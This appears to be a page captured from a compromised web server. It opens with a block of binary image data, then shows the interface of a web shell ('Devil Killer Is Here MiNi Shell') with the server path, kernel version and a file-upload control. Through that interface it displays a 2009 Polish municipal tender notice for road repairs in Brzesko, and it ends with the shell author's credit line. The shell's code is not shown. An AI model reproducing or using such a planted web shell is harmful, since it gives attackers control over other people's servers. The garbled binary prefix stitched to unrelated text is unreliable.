JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090213/37313-N-2009.html

<p class="kh_header"><b>Brzesko: Remont cząstkowy dróg w Gminie Brzesko</b><br>
<b>Numer ogłoszenia: 37313 - 2009; data zamieszczenia: 13.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Brzeska , ul. Głowackiego 51, 32-800 Brzesko, woj. małopolskie, tel. 0-14 68 63 100, faks 0-14 66 305 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brzesko.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont cząstkowy dróg w Gminie Brzesko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie remontu cząstkowego dróg w gminie
Brzesko o łącznej  długości ok. 70 km.
Ze względu na charakter poszczególnych prac zgrupowano poszczególne technologie w dwóch Zadaniach
ZADANIE I - Wykonanie remontu cząstkowego
dróg emulsją asfaltową przy użyciu grysów bazaltowych płukanych.
ZADANIE II - Wykonanie nakładek asfaltowych masą mineralno -asfaltową i asfaltobetonem.
ZADANIE I
Część A I
Zakres robót obejmuje wykonanie remontu cząstkowego , przy zastosowaniu następujących
technologii /ustalonych podczas przeglądu pozimowego powierzchni dróg/
1. 1-krotne powierzchniowe utrwalenie nawierzchni bitumicznej emulsją asfaltową w ilości 1,7
kg/m2,
przy użyciu grysu bazaltowego (płukanego) w ilości 12 kg/m2
2. 2-krotne powierzchniowe utrwalenie nawierzchni bitumicznej emulsją asfaltową w ilości 4
kg/m2,
przy użyciu grysu bazaltowego (płukanego) w ilości 32,5 kg/m2
3. 3-krotne półwgłębne utrwalenie podbudowy emulsją asfaltową i grysem bazaltowym (płukanym)
wg technologii, jak powyżej :
- I WARSTWA : emulsja asfaltowa w ilości 4,5 kg/m2
grysy bazaltowe (płukane) fr. 8/11 mm w ilości 25 kg/m2
- II WARSTWA: emulsja asfaltowa w ilości 2,30 kg/m2
grysy bazaltowe (płukane) fr. 5/8 mm w ilości 20 kg/m2
- III WARSTWA: emulsja asfaltowa w ilości 1,70 kg/m2
grysy bazaltowe (płukane) fr. 2/5 mm w ilości 12 kg/m2
4. Likwidacja rakowin i spękań nawierzchni bitumicznej emulsją asfaltową w ilości 1,2 kg/m2,
przy użyciu grysów w ilości 10 kg/m2 (przy użyciu remontera połaciowego z możliwością
remontowania wyselekcjonowanych fragmentów drogi
5. Remont wyboi i przy głębokości wyboi do 2 cm emulsją asfaltową w ilości wg technologii
remontera
6. Remont wyboi emulsją asfaltową przy średniej grubości 5 cm, wg. technologii remontera
7. Remont wyboi mieszankami mineralno-asfaltowymi przy średniej grubości 5 cm wg. technologii:
wycięcie piłą uszkodzonych miejsc nawierzchni z nadaniem regularnych kształtów, oczyszczenie
uszkodzonych miejsc z usunięciem rumoszu, ogrzanie bitumu i skropienie naprawianego
miejsca , rozścielenie mieszanki mineralno-asfaltowe , skropienie bitumem powierzchni górnej
warstwy i zasypanie kruszywem.
8. Jak w punkcie nr 7 , lecz bez wycięcia piłą uszkodzonych miejsc
9. Mechaniczne wykonanie koryta (na szer. jezdni, lub poszerzeniach ) o gł. 20 cm ze złożeniem
urobku na odkład lub hałdę
10. Mechaniczne wykonanie koryta (na szer. jezdni, lub poszerzeniach ) o gł. 20 cm z transportem
urobku na odległość 2km
11. Wykonanie podbudowy z kruszywa hutniczego o grub. 10 cm
UWAGA: W pozycjach 1-8 należy uwzględnić ubicie, lub uwałowanie poszczególnych warstw
kruszywa oraz usunięcie z jezdni i chodników kruszywa (grysu) niezwiązanego z
nawierzchnią drogi.
Z chodników kruszywo należy usunąć w dniu realizacji remontu.
Część BI
Krawężniki i urządzenia odwadniające w ciągu zadania I
1. Regulacja pionowa włazów kanałowych studni rewizyjnych:
a/ pierścieniami żeliwnymi
b/ betonem
2.Regulacja pionowa kratek ulicznych studni ściekowych:
a/ ramkami żeliwnymi
b/ przez podmurowanie betonem.
3. Roboty rozbiórkowe - krawężniki betonowe
4. Ułożenie krawężników na ławie betonowej:
a/ z materiałów z odzysku /krawężniki/
b/ z nowych materiałów
U w a g a : Remont cząstkowy nawierzchni z zastosowaniem remontera drogowego, dla
poszczególnych rodzajów uszkodzeń składa się z następujących operacji:
ad A 4. Likwidacja rakowin i spękań nawierzchni bitumicznych:
-oczyszczenie naprawianego miejsca mechanicznie szczotką,
-natryskiwanie pod ciśnieniem lepiszcza (selektywnie tylko w miejscach wystąpienia
rakowin lub pęknięć )z równoczesnym zasypaniem suchym grysem o fr. 2/5, 5/8, 8/11mm
w zależności od głębokości rakowiny
- dociśnięcie zasypanego grysu walcem gumowym
ad A5. Usuwanie ubytków /wyboi/ bitumicznej warstwy o głębokości do 2 cm:
- oczyszczenie naprawianego miejsca sprężonym powietrzem,
- natryskiwanie lepiszcza na dno i krawędzie oczyszczonego miejsca,
jako skropienie podłoża,
- natrysk pod ciśnieniem wymieszanego w dyszy grysu z lepiszczem w
naprawiane miejsce,
- uziarnienie mieszanki grysów2/5, 5/8mm ,
- natrysk pod ciśnieniem suchego grysu, jako zamknięcie.
Ad A6. Usuwanie ubytków i wyboi nawierzchni o grubości 2-5 cm:
-oczyszczenie naprawianego miejsca sprężonym powietrzem,
-natryskiwanie lepiszcza na dno i krawędzie oczyszczonego miejsca, jako skropienie
podłoża,
-natrysk pod ciśnieniem wymieszanego w dyszy grysu o fr. 2/5, 5/8, 8/11mm
/w zależności od głębokości ubytku/ z lepiszczem w naprawiane miejsce,
-natrysk pod ciśnieniem wymieszanego w dyszy grysu o fgr. 2/5, 5/8mm mm z lepiszczem
w naprawiane miejsce, jako drugiej warstwy,
-natrysk pod ciśnieniem suchego grysu.
Z uwagi na występujące w zastosowanej technologii remontu cząstkowego, przy użyciu remontera
drogowego różnice technologiczne - w zależności od stosowanego remontera drogowego i
stosowanej emulsji, opracowanej pod kątem tych maszyn oraz braku unormowania technologii,
wymagane jest przez Wykonawców biorących udział w przetargu złożenie następujących danych
technologicznych remontera drogowego, które winny zawierać:
a/ ogólne zasady wykonywanego remontu, przy zastosowaniu posiadanego remontera drogowego,
b/ rodzaj i uziarnienie kruszywa w zależności od głębokości ubytku nawierzchni jezdni,
c/ szczegółowy opis parametrów technicznych i zasad działania zastosowanego remontera
drogowego oraz sprzętu towarzyszącego,
d/ opis sposobu naprawy nawierzchni asfaltowych, w tym:
1. określenie warunków atmosferycznych w jakich jest możliwość wykonywania
robót,
2. podanie poszczególnych operacji wykonywania remontu w zależności od
głębokości uszkodzenia nawierzchni,
3. ilości dozowanych materiałów na jednostkę obmiarową robót /lepiszcza i
kruszywa/,
4. wymagania techniczne wykonywanego remontu,
5. sposób pielęgnacji wykonywanych łat asfaltowych.
ZADANIE II -
Część AII
Wykonanie nakładek asfaltowych o łącznej powierzchni około 14 000m2
1. Warstwa ścieralna z masy mineralno - asfaltowej o grub. 4 cm
2. Warstwa ścieralna z asfaltobetonu o grub. 4 cm
3. Frezowanie nawierzchni asfaltowych o średniej grubości 4 cm
4. Mechaniczne wykonanie koryta (na szer. jezdni, chodnika) o gł. 20 cm ze złożeniem urobku na
odkład lub hałdę
5. Mechaniczne wykonanie koryta (na szer. jezdni, chodnika) o gł. 20 cm z transportem urobku na
odległość 2 km
6. Wykonanie podbudowy z kruszywa hutniczego o grub. 10 cm
Część BII
Krawężniki i urządzenia odwadniające w ciągu zadania II
1. Regulacja pionowa włazów kanałowych studni rewizyjnych:
a/ pierścieniami żeliwnymi
b/ betonem
2. Regulacja pionowa kratek ulicznych studni ściekowych:
a/ ramkami żeliwnymi
b/ przez podmurowanie betonem
3. Roboty rozbiórkowe - krawężniki betonowe
4. Ułożenie krawężników na ławie betonowej :
a/ z materiałów z odzysku /krawężniki/
b/ z nowych materiałów
Ponadto Załącznikiem  Nr 10 SIWZ jest Specyfikacja techniczna wykonania i odbioru robót dla zadania I i II.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.41-9, 45.23.32.20-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferent zapewni jako część swojej oferty wadium w wysokości;
-dla Zadania I  - 2 000 zł (słownie : dwa tysiące złotych,
-dla Zadania II  - 4 000 zł. /cztery tysiące złotych/,
-dla obu zadań w wysokości 6 000,00 zł (słownie : sześć tysięcy złotych) zgodnie z art 45 upzp oraz pkt 8 SIWZ<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunkiem udziału w postępowaniu jest;
1/ być uprawnionym do występowania w obrocie prawnym zgodnie z wymaganiami
ustawowymi i nie może być w trakcie procesu likwidacyjnego, lub upadłościowego,
2/ dysponować personelem doświadczonym i posiadającym uprawnienia techniczne w zakresie
przedmiotu zamówienia,
3/ wykonać w okresie ostatnich 5-ciu lat terminowo i dobrze przynajmniej dwa zlecenia o
podobnym charakterze, jak przedmiot zamówienia,
4/ dysponować odpowiednim sprzętem technicznym umożliwiającym sprawną realizację
zamówienia,
5/ znajdować się w sytuacji finansowej zapewniającej wykonanie zamówienia,
6/ nie podlegać wykluczeniu z postępowania na podstawie art.24 Prawa zamówieniach
publicznych
7/ akceptacja projektu umowy , stanowiącego załącznik (Nr 5 A i 5 B) niniejszej specyfikacji,
która musi być podpisana i parafowana na każdej stronie i złożona wraz z ofertą.
Ocena polega m.in. na sprawdzeniu; czy dany dokument został wystawiony przez podmiot lub
organ uprawniony do jego wystawienia, czy wystawiony jest w okresie ustalonym przez prawo
(nie później niż wskazano),czy zawiera informacje wymagane dla tego dokumentu, czy
adresatem tego dokumentu jest wykonawca uczestniczący w przedmiotowym postępowaniu, czy
kserokopia załączona przez wykonawców w miejsce oryginału została potwierdzona - za
zgodność - przez osoby uprawnione lub pełnomocnictwa udzielonego przez osoby uprawnione,
czy złożony dokument jest kompletny,
Wynikiem przeprowadzenia przez zamawiającego powyższego badania jest wypełniony
druk ZP-14 - ocena spełnienia warunków udziału w postępowaniu. Druk ten zawiera w swojej
treści dla każdego z badanych dokumentów (metodą zero-jedynkową) oznaczenie spełnia - nie spełnia ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dla potwierdzenia spełnienia przez wykonawców warunków, o których mowa w punkcie 4
SIWZ, zamawiający żąda następujących dokumentów:
dot. pkt 4.1
1. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji
działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do
ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem
terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie
zamówienia albo składania ofert;
2. aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału
Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego
potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz
składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane
prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w
całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące
przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o
udzielenie zamówienia albo składania ofert;
3. aktualną informację z Krajowego Rejestru Karnego w zakresie określonym
w art. 24 ust. 1 pkt 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem
terminu składania wniosków o dopuszczenie do udziału
w postępowaniu o udzielenie zamówienia albo składania ofert;
4. aktualną informację z Krajowego Rejestru Karnego w zakresie określonym
w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu
składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo
składania ofert:
dot. pkt 4.2
1.Wykazu osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć
w wykonywaniu zamówienia, jako nadzór budowlany wraz z informacjami na temat ich kwalifikacji
zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a
także zakresu wykonywanych przez nie czynności
1a) pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych
do wykonania zamówienia, jeżeli w wykazie, o którym mowa , wykonawca wskazał osoby,
którymi będzie dysponował;
1b) Dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają
wymagane uprawnienia do prowadzenia tego typu prac budowlanych -dla nadzoru bezpośredniego -
zgodnie z art. 12 obowiązującego prawa budowlanego,
dot. pkt 4.3 wykazu wykonanych w okresie ostatnich pięciu lat robót budowlanych odpowiadających
swoim rodzajem i wielkością robotom budowlanym stanowiącym przedmiot zamówienia,
z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów
potwierdzających, że roboty te wykonane zostały z należytą starannością ( kopie prot. odbioru,
referencje) - co najmniej 2 o podobnym charakterze i o wartości minimum 400 tys zł w
wybranym roku działalności .
dot. pkt 4 4
1) wykazu niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub
będzie dysponował wykonawca- jako minimum wymagane jest ;
-dla ZADANIA I:
-remonter do naprawy powierzchniowej pod ciśnieniem z
dwukomorowym zasobnikiem grysu dla różnych frakcji.
-remonter automatyczny połaciowy z możliwością remontowania
wyselekcjonowanego fragmentu drogi
-walec ogumiony
- piła do cięcia asfaltu
- szczotka do czyszczenia mechanicznego
-dla ZADANIA II: rozkładarka do mas bitumicznych - szer. min. 4 m
- walec statyczny samojezdny /15 t/,
-walec wibracyjny
-walec ogumiony
-równiarka drogowa
-samochód wywrotka
1a) pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wy
konania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa
w pkt 4 wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował;
dot. pkt 4.5
1) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej,
w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków
finansowych lub zdolność kredytową wykonawcy w wysokości min. 150tys. złotych, dla I
zadania i 200tys. zł dla II zadania ( dla obu zadań 350 tys. zł) wystawionej nie wcześniej
niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w
postępowaniu o udzielenie zamówienia albo składania ofert;
2) polisy, a w przypadku jej braku innego dokumentu potwierdzającego,
że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej
działalności.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej
Polskiej, zamiast dokumentów, o których mowa w § 1 ust. 1 pkt 1, 5 i 6, Rozporządzenia Prezesa
Rady Ministrów z dnia 19 maja 2006 r. ( DZ. U Nr.87 poz. 605 z późn. zm.) składa dokument lub
dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające
odpowiednio, że:
a/ nie otwarto jego likwidacji ani nie ogłoszono upadłości / ważne 6 m-cy /;
b/ nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne
albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych
płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c/ nie orzeczono wobec niego zakazu ubiegania się o zamówienie/ ważne 6 mcy
/;
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce
zamieszkania, nie wydaje się dokumentów, o których mowa w § 2 ust. 1 oraz w § 1 ust. 1 pkt 4
Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. ( DZ. U Nr.87 poz. 605 z późn.
zm.), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem,
właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub
gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę
lub miejsce zamieszkania.
Zamawiający żąda następujących oświadczeń :
1. Oświadczenia w trybie art. 22 ustawy Pzp - załącznik Nr 1 SIWZ.
2. Oświadczenia w trybie art. 24 ustawy Pzp - załącznik Nr 2 SIWZ.
3. Oświadczenia uzupełniającego w zależności od statusu prawnego Oferenta w trybie art. 24 ust. 1
pkt 4-9 ustawy Pzp - załącznik Nr 3 SIWZ.
4. Oświadczenie o akceptacji projektu umowy na takich warunkach jak we wzorze umowy
stanowiącym załącznik NR 5A i 5B SIWZ - załącznik Nr 4 SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.brzesko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Brzesku
32-800 Brzesko ul. Głowackiego 51. pok.nr.108
telefon 0-14 68 63 100 wew. 144  w dniach pracy 
w godz. od 7:30 do 15:30
e-mail; ph.komunalne@brzesko.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2009 godzina 09:00, miejsce: Urząd Miejski w Brzesku
32-800 Brzesko ul. Głowackiego 51. pok.nr.101 - Sekretariat Burmistrza Brzeska.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Na podstawie art. 144 ust 1 zamawiający przewiduje możliwość dokonania zmian
postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano
wyboru wykonawcy oraz określa poniżej warunki takiej zmiany;
1.Wykonanie robót budowlanych zamiennych w oparciu o ceny wynikające
z właściwych wartości wskazanych z formularzu ofertowym.
Warunkami tych zmian są:
-wskazanie robót, zamiennych, które ze względów ekonomicznych lub technicznych mogą być
wykonane w innej technologii lub przy użyciu innych materiałów,
-zgoda obu stron umowy ,
-zmiany te muszą być korzystne dla zamawiającego,
-nie wpłynie to w żaden sposób na zmiany wartość zawartej umowy.
2. Zmiana terminu wykonania robót budowlanych,
Warunkami takiej zmiany są:
Wystąpienie zdarzeń technicznych lub okoliczności , których nie można było przewidzieć a które
uniemożliwiają terminową realizację zadania,
W szczególności zdarzenia te obejmują jedną z poniższych przyczyn:
-niezidentyfikowane uzbrojenie terenu,
-ekstremalnie niekorzystne warunki pogodowe,
-konieczność uzyskania dodatkowych zezwoleń,
-zgoda obu stron umowy ,
-zmiany te ze względów muszą być korzystne dla zamawiającego,
-nie wpłynie to w żaden sposób na zmiany wartość zawartej umowy..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE I - projekt umowy - Wykonanie remontu cząstkowego
dróg emulsją asfaltową przy użyciu grysów bazaltowych płukanych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis tego zadania w odgłoszeniu głównym punkt II.1.3..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.41-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE II -Wykonanie nakładek asfaltowych
masą mineralno -asfaltową i asfaltobetonem.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis tego zadania w odgłoszeniu głównym punkt II.1.3..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com